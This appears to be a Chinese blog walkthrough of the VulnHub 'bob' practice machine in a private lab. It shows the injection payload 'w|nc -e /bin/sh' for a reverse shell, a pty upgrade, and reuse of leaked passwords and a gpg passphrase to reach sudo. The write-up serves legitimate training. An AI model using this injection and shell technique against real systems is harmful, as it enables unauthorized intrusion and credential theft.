每周靶机之bob

总之这是这周的靶机

环境设置

攻击机:kali(192.168.246.128)
靶机:bob (192.168.246.138)

使用工具&指令&知识

nc(瑞士军刀)
nmap (端口扫描)
gpg加密
命令执行漏洞

具体过程

首先国际惯例

arp-scan -l //发现同网段设备
nmap -A -p- [ip地址] //扫描该ip的端口并使用默认脚本

3
4
发现了该靶机开放了21端口(对应ftp服务) 80端口(对应http服务) 25468端口(对应ssh服务)
我们先从http服务开启 firefox访问
5
主页与超链接经检查 没有发现什么特别的东西
于是我们来看看nmap在/robots.txt下扫描出的四个目录

什么是robots.txt

robots.txt是网站管理者写给爬虫的一封信,里面描述了网站管理者不希望爬虫做的事,比如:

  • 不要访问某个文件、文件夹
  • 禁止某些爬虫的访问
  • 限制爬虫访问网站的频率

一个自觉且善意的爬虫,应该在抓取网页之前,先阅读robots.txt,了解并执行网站管理者制定的爬虫规则。

发现dev-shell目录中存在命令执行漏洞 既使用 管道符| 来执行nc相关命令
在kali上执行nc -lnvp 1234 //指定1234端口开始监听
7
运用命令行输入w|nc -e /bin/sh [kali的ip] [指定端口]

1
2

随后反弹shell成功
首先 反弹到的shell页面不是很易懂 我们可以使用python -c 'import pty; pty.spawn("/bin/bash")'来创建一个伪终端 方便后面的操作

8

根据该作者在vulnhub上的提示 flag文件位于**/目录
但权限不够 我们需要提权
先根据我们对该靶机的推测 在/home/bob中寻找线索
发现了一个
.old_passwordfile.html**
9
查看后是两对密码和账号
我们通过ssh链接来分别测试这些账号密码
10
很好 jc账号的密码正确 链接了靶机
11
再次在/home/bob下寻找线索 发现/Documents下有一个名为secret的文件夹和一个经过gpg加密的文件login.txt 需要密码
我们使用ls -alR // -R 递归显示所有子文件夹和其中的文件查看
13
有一个notes.sh文件 我们查看其中的内容
14
前言不搭后语的 但第一个字母都着重大写了 并且是一个单词 我们把它当作藏头诗理解 尝试解密先前的gpg文件
16
gpg --output [输出文件名] --decrypt [需要解密的文件名]
15
输入密码HARPOCRATES(你可别说这页面还挺炫)
16
解密出来又是一套账号密码
再次登录 发现这次的账号有sudo权限
那很方便了 利用sudo查看该flag文件
17
结束!

总结

较为简短的靶机 结合了gpg加密与命令执行漏洞的知识
学无止境 期待下次的靶机